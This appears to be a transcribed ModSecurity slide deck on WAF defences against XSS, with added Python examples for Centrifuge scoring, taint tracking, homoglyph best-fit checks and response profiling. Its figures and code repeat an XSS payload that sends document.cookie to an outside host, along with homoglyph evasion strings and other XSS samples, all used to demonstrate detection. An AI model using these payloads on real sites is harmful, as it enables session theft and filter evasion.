Strip Padding2 - name is: ARGS:test and value is: x=/x/ $x=!!1?\"a... [partly legible]
stripped length is: 32.
overall value is: x=/x/ $x=!1?\"aaa\"aaa$x=!1?\"aaa\"+$aaa$x=!1?\"aaa\"+$aaa=\"\"aaa$x)).
overall length is: 69.
Set variable "tx.ARGS:test_centrifuge_ratio" to "2.15625".
Threshold is: 3.49 and Ratio Value is: 2.15625.
Debug Log View of Centrifuge Stripping

Unique/Sorted: !"$()+,./1:=?\acehilnostvx.
Replace non-special chars: "$()+/=?\.
Normalize certain tokens: "$()++=?\.
Normalize certain tokens: "$()++=?\.
Normalize certain tokens: "$((++=?\.
Normalize certain tokens: "$((++::\.
Normalize certain tokens: ((++::.
Normalize certain tokens: ((++::.
Sorted: ((++::.
Setting variable: tx.ARGS:test_centrifuge_converted=((++::
Set variable "tx.ARGS:test_centrifuge_converted" to "((++::".
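The two debug logs above trace the PHPIDS Centrifuge steps (ratio of overall length to the length of what is left after stripping "normal" characters, then a reduction of the value to its structural symbols) and the CRS demo before them shows the two Core Rule Set counters (number of distinct restricted characters, runs of four or more non-word characters). The following is an added example written for this page in Python; it is not the CRS Lua port or ModSecurity code. The ratio and stripping steps follow the PHPIDS Centrifuge algorithm as it appears in the log lines, the `< 3.49` threshold and `@ge 5` limit are the slides' values, and since the slide's restricted-character list is only partly legible, `string.punctuation` is used as a stand-in for it. The two inputs are constructed here; the obfuscated one is modelled on the `x=/x/ $x=...` value in the log.

```python
import re
import string
import unicodedata

# Added example, not CRS/ModSecurity code: Python rendering of the generic
# checks on the slides. Centrifuge steps follow the PHPIDS algorithm as traced
# in the debug logs; the restricted-character list is approximated with
# string.punctuation because the slide's list is only partly legible.

RATIO_THRESHOLD = 3.49                      # slide: ratio < 3.49 = malicious
RESTRICTED_COUNT_LIMIT = 5                  # slide: TX:RESTRICTED_CHAR_COUNT "@ge 5"
RESTRICTED = frozenset(string.punctuation)  # stand-in for the slide's @pm list
REPEATED_NON_WORD = re.compile(r"\W{4,}")   # slide: SecRule ARGS "\W{4,}"
CENTRIFUGE_PATTERN = re.compile(            # PHPIDS filter run over the converted string
    r"(?:\({2,}\+{2,}:{2,})|(?:\({2,}\+{2,}:+)|(?:\({3,}\++:{2,})")
TOKEN_TO_PLUS = re.compile(r"[~^|*%&/]")
TOKEN_TO_PAREN = re.compile(r"[()\[\]{}]")
TOKEN_TO_COLON = re.compile(r"[!?:=]")


def _is_punct(ch):
    return unicodedata.category(ch).startswith("P")


def centrifuge_ratio(value):
    """overall length / length of the 'special' characters that survive stripping.
    None when the value is short or nothing special is left (no ratio to judge)."""
    if len(value) <= 25:
        return None
    tmp = re.sub(r"\s{4}|==+", "", value)                    # Strip Padding1
    tmp = re.sub(r"\s{4}|[\w+\-=,.%()]{8,}", "aaa", tmp)      # Strip Padding2
    stripped = "".join(c for c in tmp
                       if not (c.isalnum() or c.isspace() or _is_punct(c)))
    overall = re.sub(r"[\d\s\w]{3,}", "aaa", re.sub(r"\s{2,}", "", tmp))
    if not stripped:
        return None
    return len(overall) / len(stripped)


def centrifuge_convert(value):
    """Reduce the value to its structural symbols, step for step as in the log:
    Unique/Sorted -> Replace non-special chars -> Normalize tokens -> Sorted."""
    if len(value) <= 40:
        return ""
    converted = "".join(sorted(set(value)))                   # Unique/Sorted
    converted = re.sub(r"[\w\s,.:!]", "", converted)          # Replace non-special chars
    converted = TOKEN_TO_PLUS.sub("+", converted)             # Normalize certain tokens
    converted = re.sub(r"[+-]\s*\d+", "+", converted)
    converted = TOKEN_TO_PAREN.sub("(", converted)
    converted = TOKEN_TO_COLON.sub(":", converted)
    converted = re.sub(r"[^:(+]", "", converted)
    return "".join(sorted(converted))                         # Sorted


def restricted_char_count(value):
    """Distinct restricted characters present: one +1 per @contains rule."""
    return len(RESTRICTED.intersection(value))


def inspect_value(value):
    ratio = centrifuge_ratio(value)
    converted = centrifuge_convert(value)
    count = restricted_char_count(value)
    return {
        "ratio": ratio,
        "converted": converted,
        "restricted_count": count,
        "centrifuge_ratio_alert": ratio is not None and ratio < RATIO_THRESHOLD,
        "centrifuge_pattern_alert": bool(CENTRIFUGE_PATTERN.search(converted)),
        "restricted_count_alert": count >= RESTRICTED_COUNT_LIMIT,
        "repeated_non_word_alert": bool(REPEATED_NON_WORD.search(value)),
    }


# Constructed inputs: an obfuscated fragment modelled on the 'x=/x/ $x=...'
# value in the debug log, and an ordinary sentence.
OBFUSCATED = 'x=/x/;$x=!!1?"aaa":"bbb";x.x=""+eval;x.x(x.x($x))'
BENIGN = "hello world, this is a normal comment."

if __name__ == "__main__":
    for sample in (OBFUSCATED, BENIGN):
        print(inspect_value(sample))
```

On the obfuscated input the converted string comes out as `((++::`, the same token the demo page shows for rule 9000067, and three of the four checks fire (the ratio stays above the threshold for this particular value, which is why the checks are run in combination and scored rather than relied on singly); the plain sentence triggers none of them.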
WAF Defensive Strategy #3:
Identifying Improper Output Handling Flaws

Dynamic Taint Propagation

* Follow untrusted data and see where it is misused

[Figure, recovered as a numbered flow:]
(1) Reflected XSS victim submits the malicious payload to the web application:
    document.write('<img src="http://teap.zzl.org/teap.php?data='+document.cookie+'"/>')
(2) ModSecurity inspects inbound data looking for suspicious payloads (containing meta-characters)
(3) Target Site responds:
    <html><body>..document.write(&#x27&lt;img src=&quot;http:&#x2f&#x2fteap.zzl.org&#x2fteap.php?data=&#x27%2bdocument.cookie%2b&#x27&quot;&#x2f&gt;&#x27)...</body></html>
(4) ModSecurity inspects outbound response body and does not find a match as the app applied output encoding/escaping of user-supplied data
Dynamic Taint Propagation

* Missing Output Encoding - Reflected XSS Attack

[Figure, recovered as a numbered flow:]
(1) Reflected XSS victim submits the malicious payload to the web application:
    document.write('<img src="http://teap.zzl.org/teap.php?data='+document.cookie+'"/>')
(2) ModSecurity inspects inbound data looking for suspicious payloads (containing meta-characters)
(3) Target Site responds:
    <html><body>..document.write('<img src="http://teap.zzl.org/teap.php?data='+document.cookie+'"/>')...</body></html>
(4) ModSecurity inspects the current outbound response body and if suspicious inbound data is sent back out non-encoded, it can block the response
Reflected Application Defect Rule

SecRule ARGS "@pm < > ( ) \" ' ;" "chain,phase:4,t:none,log,auditlog,deny,status:403,id:'1',msg:'Potentially Malicious Meta-Characters in User Data Not Properly Output Encoded.',logdata:'%{tx.inbound_meta-characters}'"
  SecRule MATCHED_VAR "^.{13,}$" "chain,setvar:tx.inbound_meta-characters=%{matched_var}"
    SecRule RESPONSE_BODY "@contains %{tx.inbound_meta-characters}" "ctl:auditLogParts=+E"
Dynamic Taint Propagation

* Missing Output Encoding - Stored XSS Attack

[Figure, recovered as a numbered flow:]
(1) Attacker submits the malicious stored XSS payload to the web application:
    ..document.write('<img src="http://teap.zzl.org/teap.php?data='+document.cookie+'"/>')
(2) ModSecurity inspects inbound data looking for suspicious payloads (containing meta-characters)
(3) Target Site later responds to another user:
    <html><body>..document.write('<img src="http://teap.zzl.org/teap.php?data='+document.cookie+'"/>')...</body></html>
(4) ModSecurity inspects all outbound response bodies and if suspicious inbound data is sent back out non-encoded, it can block the response
Stored Application Defect Rule

SecAction "phase:1,nolog,pass,initcol:global=xss_list"

...Reflected XSS Rules Here...

SecRule GLOBAL:'/XSS_LIST_.*/' "@streq %{tx.inbound_meta-characters}" "phase:4,t:none,nolog,pass,skip:1"

SecRule TX:INBOUND_META-CHARACTERS ".*" "phase:4,t:none,nolog,pass,setvar:global.xss_list_%{time_epoch}=%{matched_var}"

SecRule GLOBAL:'/XSS_LIST_.*/' "@within %{response_body}" "phase:4,t:none,log,auditlog,pass,msg:'Potentially Malicious Meta-Characters in User Data Not Properly Output Encoded.',tag:'WEB_ATTACK/XSS'"
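The reflected and stored defect rules above share one idea: remember a tainted inbound value and look for it, verbatim, in response bodies. The following is an added example, not code from the slides: it re-implements that logic in plain Python so the reflected check, the stored list and the "output encoding applied" case can be run side by side offline. The payloads, page bodies and the epoch used as the list key are constructed for the demo; the real rules act on live ModSecurity variables.

```python
"""Dynamic taint propagation, re-implemented in Python (added example)."""
import html

# Meta-characters from the "@pm < > ( ) \ ' ;" rule.
META_CHARS = set("<>()\\';")
# "^.{13,}$": values shorter than this are ignored to limit false positives.
MIN_LEN = 13

# Stand-in for the persistent GLOBAL collection initialised as xss_list.
xss_list = {}


def tainted_values(args):
    """Inbound check: argument values that carry meta-characters and are long enough."""
    return [v for v in args.values()
            if len(v) >= MIN_LEN and any(c in META_CHARS for c in v)]


def check_reflected(args, response_body):
    """Reflected rule: a tainted inbound value appears verbatim (@contains)
    in the response to the same request."""
    return [v for v in tainted_values(args) if v in response_body]


def remember_tainted(args, epoch):
    """Stored rule, part 1: save each new tainted value under an epoch-based key.
    The slides key on %{time_epoch} alone; a sequence number is appended here
    so two payloads submitted in the same second do not overwrite each other."""
    for v in tainted_values(args):
        if v in xss_list.values():      # @streq on existing entries -> skip
            continue
        xss_list[f"xss_list_{epoch}_{len(xss_list)}"] = v


def check_stored(response_body):
    """Stored rule, part 2: any remembered value appears verbatim (@within)
    in a later response, whatever request produced it."""
    return [v for v in xss_list.values() if v in response_body]


# Constructed payload: the cookie-stealing image tag used on the slides.
PAYLOAD = ("document.write('<img src=\"http://teap.zzl.org/teap.php?data='"
           "+document.cookie+'\"/>')")


def demo():
    args = {"comment": PAYLOAD}
    # Correct application: output escaped, so the tainted string never
    # reappears verbatim and no alert is raised.
    escaped = "<html><body>.." + html.escape(PAYLOAD, quote=True) + "..</body></html>"
    # Defective application: payload reflected unencoded.
    raw = "<html><body>.." + PAYLOAD + "..</body></html>"
    reflected_ok = check_reflected(args, escaped)
    reflected_hit = check_reflected(args, raw)
    # Stored: remember at submission time, catch it in a later, unrelated page.
    remember_tainted(args, epoch=1233816136)
    later_page = '<html><body><div class="comments">' + PAYLOAD + "</div></body></html>"
    stored_hit = check_stored(later_page)
    return reflected_ok, reflected_hit, stored_hit


if __name__ == "__main__":
    print(demo())
```

The verbatim comparison is the whole point and also the weakness: anything the application does to the string between input and output (best-fit mapping, case folding, partial escaping) defeats the match, which the next slides show.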
Viewing Saved Global Data

# java -cp /root/org.jwall.tools.jar org.jwall.tools.CollectionViewer /tmp/

global[xss_list].xss_list_1233816136 = <title>test</title>
global[xss_list].xss_list_125391131 = <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
global[xss_list].xss_list_12330172705 = <META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:alert('XSS');">
global[xss_list].xss_list_12558117138 = <BASE HREF="javascript:alert('XSS');//">
global[xss_list].TIMEOUT = 3600
Problem - Best-Fit Mappings

* The premise is this: what should the application do if it receives non-ASCII Unicode characters?

* As you might expect, applications handle this situation differently.

* Some applications will actually perform different types of transliterations to find the ASCII character that "best-fits" the current character.
  - These are homoglyphs

* ASP classic, for example, makes some of the following mappings:

    〈 (0x2329) ~= < (0x3c)
    〈 (0x3008) ~= < (0x3c)
    ＜ (0xff1c) ~= < (0x3c)
    ʹ (0x2b9)  ~= ' (0x27)
    ʼ (0x2bc)  ~= ' (0x27)
    ˈ (0x2c8)  ~= ' (0x27)
    ′ (0x2032) ~= ' (0x27)
    ＇ (0xff07) ~= ' (0x27)
Example Best-Fit Mapping Impact

(1) Inbound payload contains non-ASCII Unicode characters; the payload is not currently in an executable form for the browser:

    〈script〉eval(ʼalert("XSS")ʼ)</script>

(2) The ASP Classic web application performs a best-fit mapping and changes some of the characters in the payload. Target Site response:

    <html><body>..<script>eval('alert("XSS")')</script>...</body></html>

(3) The outbound payload has been changed into an executable form for the browser. ModSecurity inspects the outbound response body and does not find matching payloads, as the inbound and outbound are different.
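The mapping table and the worked impact above can be checked offline. The following is an added example, not code from the slides: the ASP Classic mappings quoted on the previous slide are reproduced as a table, a stand-in "application" applies them before echoing the input, and the taint check is run with and without normalisation. Two assumptions are labelled in the code: the closing-bracket forms U+232A and U+FF1E are taken to fold to ">" the same way (the slide lists only opening brackets), and the URL in the second payload is made up.

```python
"""Best-fit mapping versus the verbatim taint check (added example)."""
import unicodedata

# From the slide: non-ASCII code point -> ASCII best fit.
BEST_FIT = {
    "\u2329": "<", "\u3008": "<", "\uff1c": "<",
    "\u02b9": "'", "\u02bc": "'", "\u02c8": "'", "\u2032": "'", "\uff07": "'",
    # Assumed for the demo (not on the slide): closing brackets.
    "\u232a": ">", "\uff1e": ">",
}
META_CHARS = set("<>()\\';")   # the inbound @pm list


def best_fit(s):
    """Stand-in for the application's transliteration step."""
    return "".join(BEST_FIT.get(ch, ch) for ch in s)


def nfkc(s):
    """Unicode compatibility normalisation, the usual first answer to homoglyphs."""
    return unicodedata.normalize("NFKC", s)


def inbound_suspicious(value):
    return any(c in META_CHARS for c in value)


def taint_leaked(inbound, response_body, normalizers=()):
    """Return the form of `inbound` (raw or normalised) found verbatim in the
    response, or None. With no normalizers this is the slide's @contains check."""
    for candidate in [inbound] + [f(inbound) for f in normalizers]:
        if candidate in response_body:
            return candidate
    return None


# Constructed payloads. The first mirrors the slide: angle brackets and quotes
# are homoglyphs, the parentheses and the trailing </script> are ASCII.
SLIDE_PAYLOAD = "\u2329script\u232aeval(\u02bcalert(\"XSS\")\u02bc)</script>"
# Fullwidth-only variant with no ASCII meta-characters at all (host is made up).
FULLWIDTH_PAYLOAD = "\uff1cscript src=http://x.example/a.js\uff1e\uff1c/script\uff1e"


def app_response(inbound):
    """The defective ASP page: best-fit mapped, then echoed without escaping."""
    return "<html><body>.." + best_fit(inbound) + "...</body></html>"


def demo(inbound):
    body = app_response(inbound)
    return {
        "inbound_flagged": inbound_suspicious(inbound),
        "raw_check": taint_leaked(inbound, body),
        "nfkc_check": taint_leaked(inbound, body, [nfkc]),
        "table_check": taint_leaked(inbound, body, [nfkc, best_fit]),
        "outbound": best_fit(inbound),
    }


if __name__ == "__main__":
    print(demo(SLIDE_PAYLOAD))
    print(demo(FULLWIDTH_PAYLOAD))
```

Two things fall out of running it. NFKC alone only rescues the fullwidth forms (U+FF1C, U+FF1E, U+FF07); U+2329 normalises to U+3008, not to "<", and the modifier-letter apostrophes have no compatibility decomposition, so the slide's payload still slips past an NFKC-normalised check and an explicit table is needed. And the fullwidth payload carries no ASCII meta-character at all, so the inbound @pm rule never fires on it in the first place.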
WAF Defensive Strategy #4: Application Response Profiling

Monitoring the number of scripts/iframes

Application Response Profiling

* WAF application learning/profiling has historically been focused on inbound data

* There is a lot we can learn and detect simply by monitoring outbound data

* In order to identify successful XSS attacks (reflected and stored), we can monitor the # of expected scripts, iframes, images, etc. in responses

* Use the Lua API for accurate response body parsing and counting

* Thanks to Josh Zlatin (@jamuse) for the Lua code
profile_page_scripts.lua

function main()
    local response_body = m.getvar("RESPONSE_BODY", "none");
    if response_body then
        -- gsub returns the replaced string and the number of matches;
        -- only the count is kept for each tracked element type
        local _, nscripts = string.gsub(response_body, "<script", "");
        local _, niframes = string.gsub(response_body, "<iframe", "");
        local _, nlinks   = string.gsub(response_body, "<a ", "");
        local _, nimages  = string.gsub(response_body, "<img", "");
        -- export the counts as TX variables for the SecRules to compare
        m.log(4, "niframes: " .. niframes);
        m.setvar("tx.niframes", niframes);
        m.log(4, "nscripts: " .. nscripts);
        m.setvar("tx.nscripts", nscripts);
        m.log(4, "nlinks: " .. nlinks);
        m.setvar("tx.nlinks", nlinks);
        m.log(4, "nimages: " .. nimages);
        m.setvar("tx.nimages", nimages);
    end
    -- nil means "no match": the script only sets variables
    return nil;
end
Resource Profiling Rules

SecRuleScript profile_page_scripts.lua "phase:4,t:none,nolog,pass"

SecRule &RESOURCE:'/(niframes|nscripts|nlinks|nimages)/' "@eq 0" "skipAfter:END_PAGE_PROFILE,phase:4,t:none,nolog,pass,setvar:resource.niframes=%{tx.niframes},setvar:resource.nscripts=%{tx.nscripts},setvar:resource.nlinks=%{tx.nlinks},setvar:resource.nimages=%{tx.nimages}"

SecRule TX:NIFRAMES "@eq %{resource.niframes}" "phase:4,t:none,nolog,pass,setvar:resource.profile_confidence_counter=+1"

SecRule TX:NSCRIPTS "@eq %{resource.nscripts}" "phase:4,t:none,nolog,pass,setvar:resource.profile_confidence_counter=+1"

SecRule TX:NLINKS "@eq %{resource.nlinks}" "phase:4,t:none,nolog,pass,setvar:resource.profile_confidence_counter=+1"

SecRule TX:NIMAGES "@eq %{resource.nimages}" "phase:4,t:none,nolog,pass,setvar:resource.profile_confidence_counter=+1"

SecRule RESOURCE:PROFILE_CONFIDENCE_COUNTER "@lt 40" "phase:4,t:none,nolog,pass,skipAfter:END_PAGE_PROFILE"

SecRule TX:NIFRAMES "!@eq %{resource.niframes}" "phase:4,t:none,block,msg:'Number of IFrames in Page Have Changed.',logdata:'Previous #: %{resource.niframes} and Current #: %{tx.niframes}',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-PROFILE/ANOMALY-%{matched_var_name}=%{tx.0}"

SecRule TX:NSCRIPTS "!@eq %{resource.nscripts}" "phase:4,t:none,block,msg:'Number of Scripts in Page Have Changed.',logdata:'Previous #: %{resource.nscripts} and Current #: %{tx.nscripts}',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-PROFILE/ANOMALY-%{matched_var_name}=%{tx.0}"

SecRule TX:NLINKS "!@eq %{resource.nlinks}" "phase:4,t:none,block,msg:'Number of Links in Page Have Changed.',logdata:'Previous #: %{resource.nlinks} and Current #: %{tx.nlinks}',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-PROFILE/ANOMALY-%{matched_var_name}=%{tx.0}"

SecRule TX:NIMAGES "!@eq %{resource.nimages}" "phase:4,t:none,block,msg:'Number of Images in Page Have Changed.',logdata:'Previous #: %{resource.nimages} and Current #: %{tx.nimages}',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-PROFILE/ANOMALY-%{matched_var_name}=%{tx.0}"

SecMarker END_PAGE_PROFILE
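The Lua script and the SecRules above together form one procedure: count elements, learn a per-resource profile, build up confidence while responses agree, then alert when a trusted profile changes. The following is an added example, not the slides' Lua or rules: it re-implements that procedure in Python with a real HTML parser so the substring counting of profile_page_scripts.lua can be compared against it. The sample pages are constructed, and keying profiles by request path stands in for the RESOURCE collection, whose initialisation (initcol) the slides do not show.

```python
"""Application response profiling with a confidence counter (added example)."""
from html.parser import HTMLParser

CONFIDENCE_NEEDED = 40          # "@lt 40" in the rules
TRACKED = {"script": "nscripts", "iframe": "niframes", "a": "nlinks", "img": "nimages"}


class ElementCounter(HTMLParser):
    """Counts opening tags of the tracked elements. HTMLParser lower-cases tag
    names and routes self-closing <img .../> through handle_starttag as well."""

    def __init__(self):
        super().__init__()
        self.counts = {name: 0 for name in TRACKED.values()}

    def handle_starttag(self, tag, attrs):
        name = TRACKED.get(tag)
        if name:
            self.counts[name] += 1


def profile_counts(body):
    parser = ElementCounter()
    parser.feed(body)
    parser.close()
    return parser.counts


def substring_counts(body):
    """What string.gsub(response_body, "<script", "") and friends see:
    case-sensitive literal matches, so an injected <SCRIPT> is not counted."""
    return {"nscripts": body.count("<script"), "niframes": body.count("<iframe"),
            "nlinks": body.count("<a "), "nimages": body.count("<img")}


class ResourceProfiler:
    """Per-resource profile plus the rules' profile_confidence_counter."""

    def __init__(self):
        self.profiles = {}          # path -> {"counts": ..., "confidence": n}

    def observe(self, path, body):
        """Return anomaly messages for this response (empty while learning)."""
        counts = profile_counts(body)
        prof = self.profiles.get(path)
        if prof is None:                        # &RESOURCE:... @eq 0: learn, skipAfter
            self.profiles[path] = {"counts": counts, "confidence": 0}
            return []
        matched = [n for n in counts if counts[n] == prof["counts"][n]]
        prof["confidence"] += len(matched)      # +1 per metric that still agrees
        if prof["confidence"] < CONFIDENCE_NEEDED:
            return []                           # profile not trusted yet
        return [f"{n}: previous {prof['counts'][n]}, current {counts[n]}"
                for n in counts if n not in matched]


# Constructed baseline page: 2 scripts, 1 iframe, 3 links, 2 images.
BASE_PAGE = (
    '<html><head><script src="/app.js"></script><script>var x = 1;</script></head>'
    '<body><a href="/">home</a><a href="/about">about</a><a href="/help">help</a>'
    '<img src="/logo.png"/><img src="/hero.jpg"><iframe src="/ad.html"></iframe>'
    '</body></html>'
)
# The same page after a stored payload landed in it, written with upper-case tags.
INJECTED_PAGE = BASE_PAGE.replace(
    "</body>", "<SCRIPT>alert(document.cookie)</SCRIPT></body>")


def demo():
    profiler = ResourceProfiler()
    learning = []
    for _ in range(11):                 # 1 learning pass + 10 agreeing pages = 40
        learning += profiler.observe("/index.html", BASE_PAGE)
    return learning, profiler.observe("/index.html", INJECTED_PAGE)


if __name__ == "__main__":
    print(demo())
```

Two caveats the rules inherit from the Lua script are visible here: the literal "<script" count misses upper-case or otherwise obfuscated tags that a tokenising parser catches, and once a profile is trusted it is never re-learned, so a legitimate template change keeps alerting until the RESOURCE collection expires.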
Resource Profile Anomaly Alert

Audit log entry for a resource-profile anomaly raised by the rules above (screenshot).
WAF Defensive Strategy #5: JavaScript Sandbox Injection

ModSecurity's Content Injection Capabilities

ModSecurity's Content Injection

* Since XSS is an attack against web browser interpreters, why not take this fight there?

* ModSecurity can prepend/append any code to outbound text responses
  - By using prepend, we can ensure that our JavaScript code runs first

* Now all we need is some JavaScript sandbox code to actually inject...

* Active Content Signatures (ACS)
  - Created by Eduardo Alberto Vela Nava (sirdarckcat)
  - http://code.taobao.org/svn/ACS/
  - Similar to Mozilla's Content Security Policy (CSP) except cross-platform
  - JS sandbox with whitelisting/blacklisting capabilities
  - Recent updates include modularity: could swap in Google's Caja HTML sanitizer code
  - http://code.google.com/p/google-caja/
JS Sandbox Injection Rules

SecContentInjection On

SecRule REQUEST_FILENAME "@streq /demo/demo-deny-noescape.html" "chain,phase:4,t:none,nolog,allow:phase"
    SecRule ARGS:disable_xss_defense "^on$"

SecRule REQUEST_FILENAME "@streq /demo/demo-deny-noescape.html" "chain,phase:4,t:none,nolog,pass"
    SecRule &ARGS "@gt 0" "prepend:'<html><head><script type=\"text/javascript\" src=\"/demo/acs.js\"></script><script type=\"text/javascript\" src=\"/demo/xss.js\"></script>'"
JS Sandbox Injection — No Protection

Screenshot of http://www.modsecurity.org/demo/dem... with the "Disable XSS Content Injection" box checked (form method=GET enctype=application/x-www-form-urlencoded).

ModSecurity Content Injection Demo: XSS Defense with Active Content Signatures

The purpose of this demo is to show possible XSS defenses by using ModSecurity's Content Injection capability to insert ... beginning of html responses. This demo uses Eduardo (sirdarckcat) Vela's Active Content Signatures (ACS) code.

Read more about this concept here.

Demo Challenge

Your challenge is to try and bypass the ACS content injection and successfully execute a reflected XSS attack that executes JS code in your browser. You may toggle On/Off the XSS Content Injection Defense by checking the box in the form below. This will help to facilitate testing of working XSS payloads.

If you are successful, please notify us at any of the following places:
- @ModSecurity on Twitter
- OWASP ModSecurity Core Rule Set Mail-list
- Submit bug report to Jira

Last Data Submitted (is unescaped):
<script>alert('Hello')</script>

Submit bug report or evasions

Result with the defense disabled: the browser shows the dialog "The page at http://www.modsecurity.org says: Hello".

Copyright Trustwave 2011 Confidential
JS Sandbox Injection — With Protection

Screenshot of the same demo page with the "Disable XSS Content Injection" box unchecked. The same data was submitted (Last Data Submitted (is unescaped): <script>alert('Hello')</script>), and no alert dialog appears.
FireBug Displays — JS Sandbox Code

With the defense on, FireBug's HTML view of the response shows the prepended sandbox scripts in the head, followed by the original page source captured as text inside a hidden <plaintext> element:

<html>
  <head>
    <script src="/demo/acs.js" type="text/javascript">
    <script src="/demo/xss.js" type="text/javascript">
  </head>
  <body>
    <plaintext style="display: none;">&lt;html&gt; ... &lt;title&gt;ModSecurity Content Injection Demo&lt;/title&gt; ... &lt;link href="http://www.modsecurity.org/ms.css" rel="StyleSheet"&gt; &lt;link rel="shortcut icon" href="http://www.modsecurity.org/favicon.ico" type="image/x-icon"&gt; &lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8"&gt; &lt;script type="text/javascript" src="http://www.modsecurity.org/demo/demo-deny-..."&gt;&lt;/script&gt; &lt;/head&gt; &lt;body&gt; ...

The submitted <script>alert('Hello')</script> is still visible in the form ("Last Data Submitted (is unescaped)"), but the browser never parses it as markup.
Questions?


rbarnett@trustwave.com 


